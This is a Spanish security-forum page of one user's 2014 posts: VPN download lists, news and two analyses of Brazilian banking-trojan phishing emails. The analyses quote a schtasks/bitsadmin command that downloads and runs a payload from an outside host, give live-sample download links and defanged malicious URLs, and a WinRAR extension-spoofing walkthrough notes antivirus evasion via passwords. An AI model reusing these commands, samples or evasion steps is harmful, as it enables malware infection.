elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Temas
Páginas: 1 ... 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 [36] 37 38 39
351  Seguridad Informática / Seguridad / Servicios VPN gratuitos (Windows, Mac, Mobile) en: 17 Octubre 2014, 01:39 am
Comentar que en la mayoría de servicios se requiere de registro de datos...


Wiki: http://es.wikipedia.org/wiki/Red_privada_virtual

Citar
Una red privada virtual, RPV o VPN de las siglas en inglés de Virtual Private Network, es una tecnología de red que permite una extensión segura de la red local (LAN) sobre una red pública o no controlada como Internet. Permite que la computadora en la red envíe y reciba datos sobre redes compartidas o públicas como si fuera una red privada con toda la funcionalidad, seguridad y políticas de gestión de una red privada.1 Esto se realiza estableciendo una conexión virtual punto a punto mediante el uso de conexiones dedicadas, cifrado o la combinación de ambos métodos.


OpenVPN: (D.Directa para windows 7 o >, para XP o Linux visitar página de descargas)
Web: https://openvpn.net/
Descarga: https://openvpn.net/index.php/open-source/downloads.html
D.Directa (x32): http://swupdate.openvpn.org/community/releases/openvpn-install-2.3.4-I603-i686.exe
D.Directa (x64): http://swupdate.openvpn.org/community/releases/openvpn-install-2.3.4-I603-x86_64.exe
Guia: https://openvpn.net/index.php/open-source/documentation/manuals.html 
      https://openvpn.net/index.php/open-source/documentation.html
Source: http://swupdate.openvpn.org/community/releases/openvpn-2.3.4.zip
S.O móviles:
iOS: https://itunes.apple.com/es/app/openvpn-connect/id590379981?mt=8
Andriod: https://play.google.com/store/apps/details?id=net.openvpn.openvpn&hl=es



Comodo EasyVPN (Comodo Unite):
Web: https://www.comodo.com/home/download/download.php?prod=comodounite
D.Directa (x32): http://cdn.download.comodo.com/cunite/download/setups/CUnite_Setup_XP_Vista_x32.exe
D.Directa (x64): http://cdn.download.comodo.com/cunite/download/setups/CUnite_Setup_XP_Vista_x64.exe



Steganos Online Shield VPN:
Web: https://www.steganos.com/us/products/vpn/online-shield-vpn/features/
Descarga: https://www.steganos.com/en/products/vpn/online-shield-vpn/download/
D.Directa: https://file.steganos.com/software/downloader/steganos/sosintdle.exe
S.O móviles:
Andriod: https://play.google.com/store/apps/details?id=com.steganos.onlineshield



Hotspot Shield:
Web: http://www.hotspotshield.com/
D.Directa: http://mydati.com/download/hss-win2/HSS-install-e-550-plain.exe
Info: http://www.hotspotshield.com/learn/what-is-a-vpn 
S.O móviles:
Android: https://play.google.com/store/apps/details?id=hotspotshield.android.vpn&hl=es



Cyberghost VPN :
Web: http://www.cyberghostvpn.com/es_es
Descarga: http://www.cyberghostvpn.com/es_es/descarga/windows
D.Directa: http://download.cyberghostvpn.com/windows/CG_5.0.13.17.exe
Guia: https://support.cyberghostvpn.com/index.php?/Troubleshooter/List
S.O móviles:
iOS: https://itunes.apple.com/es/app/cyberghost-vpn-hotspot-schutz/id583009522?mt=8
Android: https://play.google.com/store/apps/details?id=de.mobileconcepts.cyberghost

Mac OSx:
Web: http://www.cyberghostvpn.com/es_es/descarga/mac
D.Directa: http://download.cyberghostvpn.com/mac/cg5mac_5.0.13.18.dmg



TunnelBear:
Web: https://www.tunnelbear.com/
Descarga: https://www.tunnelbear.com/download/
D.Directa: https://tunnelbear.s3.amazonaws.com/downloads/pc/TunnelBear-Intellibear.exe
Guia: http://help.tunnelbear.com/
S.O móviles:
iOS: https://itunes.apple.com/us/app/tunnelbear/id564842283?ls=1&mt=8
Android: https://play.google.com/store/apps/details?id=com.tunnelbear.android

Mac OSx: https://www.tunnelbear.com/wp-content/themes/reverie/images/tunnelbear/icon_mac.png



Your Freedom:
Web: http://www.your-freedom.net/
Descarga: http://www.your-freedom.net/index.php?id=3
D.Directa: http://ems12.your-freedom.de/download/freedom-20140903-01.exe
Guia: http://www.your-freedom.net/index.php?id=172
S.O móviles:
Android: https://play.google.com/store/apps/details?id=de.resolution.yf_android

Mac OSx: http://ems12.your-freedom.de/download/Your%20Freedom%2020140903-01.osx.zip
         http://www.macupdate.com/download/27958/freedom.dmg   
 


VPNReactor:
Web: http://www.vpnreactor.com/
Descarga:
D.Directa: https://secure.vprsecure.com/OpenVPN/VPNReactor.exe
Portable: https://members.vpnreactor.com/OpenVPN/VPNReactor_Portable.zip
Guia: http://www.vpnreactor.com/setup_tutorials.html
S.O móviles:
iOS: https://www.vpnreactor.com/iphone_pptp.html
Android: https://www.vpnreactor.com/android_pptp.html

Mac OSx: https://secure.vprsecure.com/downloading_vpn_client_for_mac.html
         https://secure.vprsecure.com/OpenVPN/VPNReactor.dmg



ProXPN:
Web: http://proxpn.com/
Descarga: http://proxpn.com/download.php
D.Directa: http://proxpn.com/installproXPN.exe
Guia: http://proxpn.com/#how
S.O móviles: Para verisiones móviles/tablet se requiere cuenta premium...
iOS: https://itunes.apple.com/us/app/proxpn-vpn-anonymous-ip-protect/id546557458?mt=8
Android: https://play.google.com/store/apps/details?id=com.proxpn.proxpn&hl=es

Mac OSx: http://proxpn.com/mac.dmg



PrivateTunnel:
Web: https://www.privatetunnel.com/
D.Directa: http://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.3.exe
Guia: https://www.privatetunnel.com/index.php/kb-using-private-tunnel.html



USAIP:
Web: http://usaip.eu/en/index.php
Descarga: http://usaip.eu/en/free_vpn.php
D.Directa: http://usaip.eu/en/vpnautoconnect.zip
D.Directa (Windows 8):http://usaip.eu/en/vpnautoconnect8.zip
Guia: http://usaip.eu/en/setup_faq.php
S.O móviles:
iOS: https://www.usaip.eu/en/tutorial_iphone.php
Android: https://www.usaip.eu/en/tutorial_vpn_android.php

Mac OSx: https://www.usaip.eu/en/tutorial_mac_os_x_lion_pptp_setup.php



SpotFlux:
Web:
Descarga: https://www.spotflux.com/#download
D.Directa: https://www.spotflux.com/downloads/sf-install-web.exe
S.O móviles:
iOS: https://itunes.apple.com/us/app/spotflux/id592453110?ls=1&mt=8/ios-a/
Android: https://play.google.com/store/apps/details?id=com.spotflux.android

Mac OSx: https://www.spotflux.com/download/mac
         http://download.raptorvpn.com/mac/release/2.11.0-27/spotflux-2.11.0-27.dmg



OkayFreedom:
Web: https://www.okayfreedom.com/
D.Directa: http://software-files-a.cnet.com/s/software/13/29/92/88/okayfreedomintdle.exe?token=1413389156_9b2ae493083136f7c0aacf938853203d&fileName=okayfreedomintdle.exe
D.Directa_2: http://download.cnet.com/OkayFreedom-VPN/3000-2144_4-75750183.html?part=dl-&subj=dl&tag=button (Elegir mejor la descarga directa, evitareis el downloader de CNET)



JAP (Anonymity & Privacy): Requiere Java.
Web: http://anon.inf.tu-dresden.de/index_en.html
D.Directa: http://anon.inf.tu-dresden.de/win/japsetup.exe
D.Directa_2: http://anon.inf.tu-dresden.de/win/jap_all/japsetup.exe (incluye java)
Guia: http://anon.inf.tu-dresden.de/help/jap_help/en/help/index.html

Mac OSx: http://anon.inf.tu-dresden.de/mac/JAP.dmg
Guía: http://anon.inf.tu-dresden.de/mac/download_en.html


VPN Gate:
Web: http://www.vpngate.net/en/
Descarga: http://www.vpngate.net/en/download.aspx
D.Directa: http://download.vpngate.jp/common/cd.aspx/vpngate-client-2014.10.15-build-9505.130866.zip
Guia: http://www.vpngate.net/en/howto_l2tp.aspx#ios
S.O móviles:
iOS: http://www.vpngate.net/en/howto_l2tp.aspx#ios
Android: http://www.vpngate.net/en/howto_l2tp.aspx#android

Github: https://github.com/SoftEtherVPN/SoftEtherVPN/
Source: http://www.softether.org/5-download/src


Hay otras alternativas a instalar un software, por ejemplo la configuración y creación de una red VPN desde tu sistema:

http://www.itshidden.eu/
iOS: https://itunes.apple.com/us/app/itshidden-vpn-for-ipad-iphone/id840893881?mt=8

http://www.vpnbook.com/freevpn
Guía: http://www.vpnbook.com/howto/

TorVPN: (requiere regsitro)
Web: http://torvpn.com/signup.html
Guia: http://torvpn.com/howitworks.html


Varios:
Servicio Online: http://www.itshidden.eu/proxy/index.php

Saludos

352  Foros Generales / Noticias / Cajeros automáticos infectados regalan millones de dólares sin tarjetas de crédi en: 7 Octubre 2014, 20:59 pm



Fuente: http://www.kaspersky.com/about/news/virus/2014/Infected-ATMs-give-away-millions-of-dollars-without-credit-cards-around-the-globe
353  Seguridad Informática / Análisis y Diseño de Malware / Trojan Banker - Segue em anexo a 2 via do boleto, Dpto Juridico. en: 30 Septiembre 2014, 23:37 pm
Código fuente del mensaje recibido:

Código:
Source:
x-store-info:4r51+eLowCe79NzwdU2kRwMf1FfZT+JrOrNqUS7nEGb27WyWDr7OJIxM0/W6OFf7u/luuGOYHbJldrqaw7hjArci/+7PnaiUt1GYT0o94FwoX2U9VuS+OZ/tzwamW3DXyb0HNhWfLe4=
Authentication-Results: hotmail.com; spf=fail (sender IP is 50.116.33.183; identity alignment result is fail and alignment mode is relaxed) smtp.mailfrom=www-data@uol.com.br; dkim=none (identity alignment result is pass and alignment mode is relaxed) header.d=hotmail.com; x-hmca=none header.id=mixelyx@hotmail.com
X-SID-PRA: mixelyx@hotmail.com
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 11chDOWqoTkwsv9Zisdxe0OuIg2e9Xe3+nPJERnQMhzmYY2w30rOUADLyhfuKR0VAaHUpByYtQLqMSnQ5cvatKmlMNBa08gleb5J4UwfwM+ovq0PfAyv3mz88ptSD0ilrCaCqbPo0o3ZNeCNF7ifkeTaGhV0pjHHB9a/uoMOHlOZRQxSQN11TsGCL4xbkYs7HGuVKA4O9XNoGdRoUSK0o1ZJ3ttMjIvd
Received: from uol.com.br ([50.116.33.183]) by BAY004-MC2F29.hotmail.com with Microsoft SMTPSVC(7.5.7601.22712);
         Tue, 23 Sep 2014 01:53:39 -0700
Received: by uol.com.br (Postfix, from userid 33)
        id 6A09161439; Tue, 23 Sep 2014 07:33:35 +0000 (UTC)
To: xxxxx@hotmail.com
Subject: Segue em anexo a 2 via do boleto, Dpto Juridico.
X-PHP-Originating-Script: 0:index.php
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
From: Juridico <mixelyx@hotmail.com>
Message-Id: <20140923073335.6A09161439@uol.com.br>
Date: Tue, 23 Sep 2014 07:33:35 +0000 (UTC)
Return-Path: www-data@uol.com.br
X-OriginalArrivalTime: 23 Sep 2014 08:53:39.0464 (UTC) FILETIME=[DE80F880:01CFD70B]
 
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
  <meta content="text/html; charset=ISO-8859-1"
 http-equiv="content-type">
  <title></title>
</head>
<body>
<a href="hxtps://storage.googleapis.com/visualizaoronlines/documento.html"><img
 style="border: 0px solid ; width: 971px; height: 648px;"
 src="hxtp://gsete.com/osticket/js/emiss.png"
 alt="Para ver o anexo clique aqui"></a>
<p><img src="hxtp://bit.ly/XZrR6u" width="1" height="1" /></p>
</body>
</html>

Aquí tenemos el archivo:

hxtps://storage.googleapis.com/visualizaoronlines/documento.html  >:D

VT: https://www.virustotal.com/es/url/b237e77608d997a5f4d036e39f87c473379436332ab8eeb7b74677e90b47a1fc/analysis/1412065188/ --> 0 / 59
AI: https://anubis.iseclab.org/?action=result&task_id=1aeb136b9180b69e47900b7de352b3a03



Aqui el análisis del archivo content.js:
VT: https://www.virustotal.com/es/file/94244ae5709a34df53ab8e1160be3dbeb8970805da2ddb652bf3a7e76744a12b/analysis/1412057891/
SHA256: 94244ae5709a34df53ab8e1160be3dbeb8970805da2ddb652bf3a7e76744a12b

Nombre: content.js
Detecciones: 2 / 55
Fecha de análisis: 2014-09-30 06:18:11 UTC ( hace 0 minutos )

instal.rdf:
Código:
File: install.rdf
MD5:  b39f4830a0e4e05367e585209fbcc71b
Size: 1080

Ascii Strings:
---------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?><!-- This Source Code Form is subject to the terms of the Mozilla Public
   - License, v. 2.0. If a copy of the MPL was not distributed with this
   - file, You can obtain one at http://mozilla.org/MPL/2.0/. --><RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:id>jid1-Sqj4NY0VG6TS9g@jetpack</em:id>
    <em:version>0.1</em:version>
    <em:type>2</em:type>
    <em:bootstrap>true</em:bootstrap>
    <em:unpack>false</em:unpack>
    <!-- Firefox -->
    <em:targetApplication>
      <Description>
        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
        <em:minVersion>21.0</em:minVersion>
        <em:maxVersion>29.0a1</em:maxVersion>
      </Description>
    </em:targetApplication>
    <!-- Front End MetaData -->
    <em:name>Visualizador Documentos</em:name>
    <em:description>a basic add-on</em:description>
    <em:creator></em:creator>
    
    
    
  </Description>
</RDF>

Versiones afectadas para firefox:

Citar
       <em:minVersion>21.0</em:minVersion>
        <em:maxVersion>29.0a1</em:maxVersion>

harness-options.json:

Código:
hxtp://lucasdasilvaregere.biz/


view-source:http://lucasdasilvaregere.biz/:

<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js" ></script>

  <link id="css-3373342544" class="www-core" rel="stylesheet" href="https://s.ytimg.com/yts/cssbin/www-core-webp-vflhcl-Ef.css" data-loaded="true">


      <link id="css-2187159078" class="www-player" rel="stylesheet" href="https://s.ytimg.com/yts/cssbin/www-player-webp-vfl3CEEFK.css" data-loaded="true">


Descarga del plugin para chrome y firefox (extraido del código fuente):

Firefox: hxtps://storage.googleapis.com/visualizaoronlines/VisualizadorDocumentos.xpi
Chrome: hxtps://chrome.google.com/webstore/detail/visualizador-online/ncmmgnoahjmpdboogfafhhaipgejaebl
Datos:
[Versión: 0.0.13
Última actualización: 22 de septiembre de 2014
Tamaño: 68.01KB
Idioma: português (Brasil)]



Upssss cuanta gente: Accesibilidad  [1.000 usuarios] "Good Botnet...."

Para abrir los archivos con extensión .xpi para Firefox pueden usar cualquier extractor, sea UniExtract, IZArc, winrar....



Otros datos:

http://whois.domaintools.com/lucasdasilvaregere.biz
[Proxied by AnonymousBitcoinDomains.com]

Información sobre los archivos con extensión .webp qie interpreta Chrome:

https://developers.google.com/speed/webp/
http://es.wikipedia.org/wiki/WebP
http://www.fileinfo.com/extension/webp

Quien quiera echarle un ojo lo he subido a dos servidores:

Descarga: http://www.mediafire.com/download/ua1tyyjby03y8h2/VisualizadorDocumentos.zip
                https://mega.co.nz/#!54ZhXRIT!zdvp1ssnsf-ad8QFAZCIHjc27H_F6X6grVlX0MXUgCo
Pass: infected

Contenido del archivo comprimido:



Espero no haber olvidado nada, cualquier cosa lo añado.

Saludos.
354  Seguridad Informática / Seguridad / Servicio online para verificar si tu cuenta de gmail está entre las robadas en: 27 Septiembre 2014, 01:04 am
En este servicio se nos dirá si nuestra cuenta de gmail está entre las 5 millones de cuentas que se filtraron en el último ataque:

xhttps://isleaked.com/sa (De momento, comprobaré)

Alternativa:

http://tecnologia.elpais.com/tecnologia/2014/09/10/actualidad/1410370277_060781.html#sumario_2|include


Saludos.
355  Foros Generales / Noticias / Piratear antenas de telefonía móvil ¿el próximo gran objetivo de los hackers? en: 27 Septiembre 2014, 00:56 am
No vi la noticia posteada por el foro, me resultó curiosa, se ve que china es moda ya  :-X

http://www.adslzone.net/2014/09/18/piratear-antenas-de-telefonia-movil-el-proximo-gran-objetivo-de-los-hackers/

La noticia es de hace 10 dia, pero me resultó interesante.

Saludos

LEER: https://foro.elhacker.net/noticias/piratear_antenas_de_telefonia_movil_iquestel_proximo_gran_objetivo_de_los_hackers-t421408.0.html
356  Sistemas Operativos / GNU/Linux / Qubes OS (R2 rc2) Sistema operativo virtualizado en: 23 Septiembre 2014, 21:41 pm
Bueno no se si comenté sobre esto, creo que si pero no encuentro el tema, llevo usandolo desde su lanzamiento y no he tenido problemas todavía, basado en Xen "by Rafal Wojtczuk and Joanna Rutkowska"


Link: https://qubes-os.org/
Screen: https://qubes-os.org/wiki/QubesScreenshots
Descarga: https://qubes-os.org/wiki/QubesDownloads
Guía de instalación: https://qubes-os.org/wiki/InstallationGuideR2rc2
Source: http://git.qubes-os.org/
Xen: http://es.wikipedia.org/wiki/Xen

Joanna_Rutkowska: http://es.wikipedia.org/wiki/Joanna_Rutkowska

Más información: http://www.invisiblethingslab.com/resources/2014/Software_compartmentalization_vs_physical_separation.pdf

Necesitareis virtualización si no no os aceptará la instalación. Puedes comprobarlo en tu BIOS.

Algunos tutoriales interesantes de verdaderos informaticos (NO H4X0R -.-):

http://www.invisiblethingslab.com/itl/Resources.html

Saludos
357  Seguridad Informática / Análisis y Diseño de Malware / BoletoSetembro.cpl en: 2 Septiembre 2014, 20:07 pm
Este mensaje lo recibí ayer, me resultó curioso y saqué algo de info, aunque de momento solo estático.
 
Aquí el código del mensaje de hotmail:
Código:
x-store-info:4r51+eLowCe79NzwdU2kRwMf1FfZT+JrOrNqUS7nEGaWI7+e07AEo5CA6K8iX7qtKtPv721BY5mo0WEcsdQP8XzOoWHLaYmOuMSRVnhqmiCChEz1ym6wxKg9LOLCqjdzXXpVvv2L+c8=
Authentication-Results: hotmail.com
; spf=fail (sender IP is 50.116.38.78;
identity alignment result is fail and alignment mode is relaxed)
smtp.mailfrom=www-data@uol.com.br; dkim=none (identity alignment result is
pass and alignment mode is relaxed) header.d=hotmail.com
; x-hmca=none
header.id
 
=mixelyx@hotmail.com X-SID-PRA: mixelyx@hotmail.com X-AUTH-Result:
NONE X-SID-Result: NONE X-Message-Status: n:n X-Message-Delivery:
Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02 X-Message-Info:
11chDOWqoTkwsv9Zisdxe0OuIg2e9Xe3+nPJERnQMhzmYY2w30rOUOVECewZibIxiC+Sp79a25TZ8EgdIr1PuKws638wpvvvqx+tQVRiOWS+BlpxQzg0Pla7ooiSB0teFiOpsoADfWGBa6fUznD7FENT6zo2DX3s5DqTQFcmRvssVEAUj+Dna6uAOBGAvm76Bn7hNIBcWaFtIbo+nQTkYPe0nrJZqeZw
Received: from uol.com.br
([50.116.38.78]) by BAY004-MC5F24.hotmail.com
 
with Microsoft SMTPSVC(7.5.7601.22712); Mon, 1 Sep 2014 21:57:04 -0700
Received: by uol.com.br
(Postfix, from userid 33) id 724011483F; Tue, 2 Sep
2014 04:57:04 +0000 (UTC) To: xxxxxxx@hotmail.com Subject: Segue em
anexo boleto referente ao mes de Setembro X-PHP-Originating-Script:
0:top01.php MIME-Version: 1.0 Content-type: text/html; charset=iso-8859-1
From: Financeiro <[color=#FF0000]mixelyx@hotmail.com[/color]> Message-Id: <
20140902045704.724011483F@uol.com.br> Date: Tue, 2 Sep 2014 04:57:04 +0000
(UTC) Return-Path: www-data@uol.com.br X-OriginalArrivalTime: 02 Sep 2014
04:57:04.0984 (UTC) FILETIME=[57427580:01CFC66A] <!DOCTYPE html PUBLIC
"-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta
content="text/html; charset=ISO-8859-1" http-equiv="content-type">
<title></title> </head> <body> <a href="
hxtp://bukhamees.com/highslide/graphics/cav.php
 
"><img style="border: 0px
solid ; width: 957px; height: 561px;" src="
hxtp://apmcity.com/css/visixaia.png
 
" alt=""></a> <p><img src="
hxtp://bit.ly/1ox7vYa
" width="1" height="1" /></p> </body> </html>

VT: https://www.virustotal.com/es/file/1784d146c729adc0586b4ee2b21de295987e47824f549b8e3e3d6dc3d6d21a57/analysis/1409643892/

Al hacer click sobre el texto nos descargará este archivo:

hxtp://bukhamees.com/highslide/graphics/cav.php --> hxtp://www.arnetltd.com/BoletoSetembro.zip

Archivo descomprimido: BoletoSetembro.cpl

Info sobre el dominio:
http://whois.domaintools.com/arnetltd.com
Citar
User ID at Hotmail.com:
USER_ID=mixelyx@hotmail.com

De momento el análisis ha sido algo estático, no tengo el otro sistema donde hago las pruebas a punto y de momento esto es lo que aporto.

Aquí teneis el análisis en Anubis:
https://anubis.iseclab.org/?action=result&task_id=1bf98778208944e7461a0d1e8b5f2ad9e&call=first
Traffic.pcap: https://anubis.iseclab.org/?action=result&task_id=1bf98778208944e7461a0d1e8b5f2ad9e&download=traffic.pcap

Un dato curioso en el análisis de AI:
Citar
"C:\WINDOWS\system32\cmd.exe" /c schtasks /CREATE /SC onstart /TN "Adobe Update" /TR "cmd /c ping -n 900 127.0.0.1 &bitsadmin /transfer My /Download /PRIORITY HIGH hxtp://gerenciador.es/a001.jpg %TEMP%\a001.cpl &%TEMP%\a001.cpl" /ru SYSTEM

Echando un ojo al tráfio de datos se observa como desc arga otro archivo desde el siguiente dominio:
hxtp://gerenciador2015.com.br/

Descargará este otro archivo:
hxtp://gerenciador2015.com.br/a001/bitsadmin.exe

VT: https://www.virustotal.com/es/file/f910f378b99f06b5f936e7dc607d5991c39b676f4f2edcaae35a5d4262573968/analysis/1409701400/ --> 0 / 55
Citar
El archivo ya ha sido analizado
Este archivo ya fue analizado por VirusTotal el 2014-08-27 14:37:08 UTC, it was first analysed by VirusTotal on 2008-09-28 16:46:23 UTC.
Detecciones: 0/55
Puede ver el último análisis o reanalizarlo otra vez ahora.

AI: https://anubis.iseclab.org/?action=result&task_id=14a121b02de6fc494d9cb0d297e9fa0d2

Saludos.
358  Seguridad Informática / Seguridad / Encuesta: En que fallan los antivirus? en: 8 Junio 2014, 02:32 am
Viendo la actual guerra entre creadores de malware y los programas que intentan protegernos, en general, ¿en que os ha fallado vuestro antivirus, suite o firewall?
Sabemos que proteger todos los entornos actuales en el área de informática es tarea ardua, cada persona en función de sus hábitos de navegación y ejecución de programas, habrá tenido diferentes experiéncias.
 
No importa si es de pago o free.
Se pueden marcar varias opciones.
La encuesta es generalizada, no se intenta crear mala reputación a ninguna casa comercial.

Saludos y gracias por participar  :D
359  Seguridad Informática / Seguridad / WinRAR File Extension Spoofing vulnerability en: 29 Mayo 2014, 16:58 pm
Hola, comentar sobre esta vulnerabilidad en Winrar, ingeniosa y fácil de llevar a cabo con éxito.
La primera referéncia la encuentro sobre marzo de 2014, supongo pueda ser un poco más antigua pero que se ha de tener en cuenta pues puede ser otro posible foco de infección.

Referéncias:

http://www.exploit-db.com/papers/32480/

http://an7isec.blogspot.co.il/2014_03_01_archive.html

http://intelcrawler.com/report_2603.pdf

http://www.youtube.com/watch?v=P5OAAoptv6E#t=11

http://thehackernews.com/2014/04/winrar-file-extension-spoofing.html


Curioso que en versiones anteriores no funcionaba, por ejemplo con la versión 3.7 podemos hacer la modificación al archivo con el editor hexadecimal, pero al intentar abrir el archivo lo ejecuta por la asociación de archivo por defecto del sistema, entonces nos da un error, ya sea con el reproductor de windows media si modificamos la extensión a .mp3, png u otro formato de archivo.

Versiones afectadas:

< v3.70: NO
v4.20: SI
v5.01: SI

v5.10(beta4): NO

A continuación se expone la forma de modificar el archivo, como posibles formas de ver el archivo sin llegarlo a ejecutar y de esta forma no infectarnos.
Para el PoC utilicé un ejecutable de SysInspector de ESET:



El fallo consiste en poder modificar el nombre mediante un editor, editando el último nombre del archivo. Abrimos el archivo comprimido con un editor hexadecimal:



Podemos usar el comando "buscar" o manualmente para localizar el segundo nombre dentro del código:



Modificamos la extensión de archivo a imagen tipo png o archivo de música mp3, en este caso elegí .mp3:





En las opciones de Winrar, podemos elegir mejor compresión, comentarios y el password necesario para pasar los antivirus.
Una vez creado el nuevo archivo comprimido modificado, le echamos un vistazo:



Modificaciones del archivo y resultado:



Viendo las propiedades del nuevo archivo modificado:



Propiedades del archivo desde el análisis en VirusTotal:



Aquí el error que comentaba si se dispone de una versión de Winrar < 4.20:



En esta captura podemos observar un .zip modificado enviados masivamente al correo (cortesía TheHackerNews):



Otra prueba que hice fue cojer un archivo infectado y alta tasa en VT (35/53) y realizar la modificación con extensión .mp3. Con un password débil este fue el resultado:

Musica.zip

SHA256:    5aa2e11777fe646dfadead0b3f492a690032f99bd7a460eb93c63ce044b79497
Nombre:    musica.zip
Detecciones:    2 / 53
https://www.virustotal.com/es/file/5aa2e11777fe646dfadead0b3f492a690032f99bd7a460eb93c63ce044b79497/analysis/1401131332/

Citar
NANO-Antivirus    Trojan.Script.Dinihou.cuefgi
Qihoo-360    virus.exp.20140401

Un password un poco más largo:

SHA256:    4d9e8cfd6f920d28ca7bdeb1d91b433de07279ecd7e8d8a34fe294343a9fd5f6
Nombre:    musica.zip
Detecciones:    1 / 53
https://www.virustotal.com/es/file/4d9e8cfd6f920d28ca7bdeb1d91b433de07279ecd7e8d8a34fe294343a9fd5f6/analysis/1401131956/

Citar
Qihoo-360    virus.exp.20140401

Otro claro ejemplo de que los antivirus no hacen bien su faena, cojemos un ejecutable limpio "SysInspector.exe" (Eset) y hacemos
la modificación al archivo (protegido con password), el resultado es este:

https://www.virustotal.com/es/file/026ca98e4e52c7296eb733a387eb22a1f17aba1757bc0bb48e468803b1385008/analysis/1401199917/ --> 1/53

La misma firma para un ejecutable limpio como para uno infectado:

Qihoo-360    virus.exp.20140401

Vería más lógico una descripción de firma tipo "Mod.ext.20140401", aunque nuca está demás ya sabiendo que el archivo ha sido modificado colocar esa alerta tipo "virus.exp.FECHA".

Ahora podremos ver un par de formas, para que cuando nos llegue un correo similar podamos ver sin llegar a infectarnos si se trata de una imagen real o se ha modificado.
Podemos hacer uso del mismo editor hexadecimal para ver su contenido y fijarnos en la cabecera del archivo:



Podemos ver como el inicio de la cabecera es típica de un ejecutable "MZ".
Para imagenes .bmp (BM)
Para imagenes .jpg (ÿØÿà..JFIF)

Mediante el mismo Winrar, desde el menú Commands --> View File, se nos abre un editor en ventana nueva, donde podemos ver en texto plano el código del archivo:



Otra forma es visualizar las Strings del archivo, también podmeos ver si se trata de una imagen o un ejecutable:



No se si el error será solucinable, de momento las últimas versiones están todas afectadas.

PD:
Comentar que solo funciona siempre y cuando creemos el archivo mediante Winrar cambiando la extensión a .zip antes de crear el archivo comprimido. Puedes hacer la prueba con extensión .rar y se dañará el archivo.


Saludos.
360  Foros Generales / Noticias / Cyberthreat Map (Mapa en tiempo real - Malware) en: 9 Mayo 2014, 04:53 am
Hola comentar de este nuevo servicio de KasperskyLabs donde han creado un mapa interactivo en 3D para ver en tiempo real y por zonas geográficas los incidentes de seguridad cibernética:

http://cybermap.kaspersky.com/



Aquí otro servicio de PandaLabs:

http://www.pandasecurity.com/img/enc/infection_spain.htm

Anteriormente podíamos ver el servicio de Hneynet pero actualmente no se actualiza o almenos no responde.

Saludos.
Páginas: 1 ... 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 [36] 37 38 39
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines